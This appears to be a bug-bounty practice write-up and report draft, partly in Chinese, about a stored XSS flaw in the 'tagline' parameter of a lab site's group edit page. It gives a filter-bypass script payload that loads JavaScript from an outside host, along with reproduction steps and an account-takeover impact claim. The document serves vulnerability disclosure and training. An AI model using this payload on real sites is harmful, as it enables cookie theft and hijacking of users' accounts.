經過簡單的payload除錯,發現存在 Filter
檢查:https://github.com/masatokinugawa/filterbypass/wiki/Browser's-XSS-Filter-Bypass-Cheat-Sheet
發現payload: <script%20src=//sec875.com/1.html%0A--%3E
有效
訪問 https://5cc259cfb319-sec875.a.barker-social.com/group/11 觸發xss payload
hackerone 將以上步驟視為有效報告
後利用:可部署VPS或在本地DNS指向127.0.0.1已證明XSS可以被執行(需要部署SSL http)
例外:進行多次觀察,tagline標籤中的值反映到了在多個頁面,那些地方是否還存在 Filter?
Report title:Storage Cross-Site Scripting XSS
Endpoint:https://5cc259cfb319-sec875.a.barker-social.com/group/11/edit
Vulnerable Parameter:tagline
Payload:POST tagline parameter <script%20src=//sec875.com/1.html%0A--%3E
正文
l have discovered a Storage XSS vulnerability affecting the endpoint 'group/11/edit' in the parameter 'tagline'. The payloed requires have a filter bypass and is a simple, <script%20src=//sec875.com/1.html%0A--%3E
You can see a working proof of concept here:
https://5cc259cfb319-sec875.a.barker-social.com/group/11/
![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1722554030/s8kv0pckkeyaxfuijrh3.png)
To reproduce:
1.After logging in, create a group and go to the following location
![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1722554027/frqlt97d6oh4rtjrtbpl.png)
2.After simple debugging, I found that there is a Filter. I checked: https://github.com/masatokinugawa/filterbypass/wiki/Browser's-XSS-Filter-Bypass-Cheat-Sheet and found that the payload: <script%20src=//sec875.com/1.html%0A--%3E is valid
![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1722554027/frqlt97d6oh4rtjrtbpl.png)
![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1722554029/jsv9dlgesgv0fkgzy21c.png)
3.Visit https://5cc259cfb319-sec875.a.barker-social.com/group/11 to trigger the xss payload
![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1722554029/ml2lep1mclz0m3itvbbi.png)
![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1722554030/s8kv0pckkeyaxfuijrh3.png)
4.Post-exploitation: You can deploy VPS or point the local DNS to 127.0.0.1. It has been proven that XSS can be executed (SSL http needs to be deployed). You will observe xss executes
Payload used: <script%20src=//sec875.com/1.html%0A--%3E. have a filtering at parameter 'tagline'.
Vulnerable parameter: tagline
Endpoint/URL: https://5cc259cfb319-sec875.a.barker-social.com/group/11/edit
lmpact:
As the sessin cookies are not protected by HTTPOnly. we can obtain these and achieve account takeover. As well as this,the CSRF token is stored the DOM which enables us to easily perform actions on behalf of the user.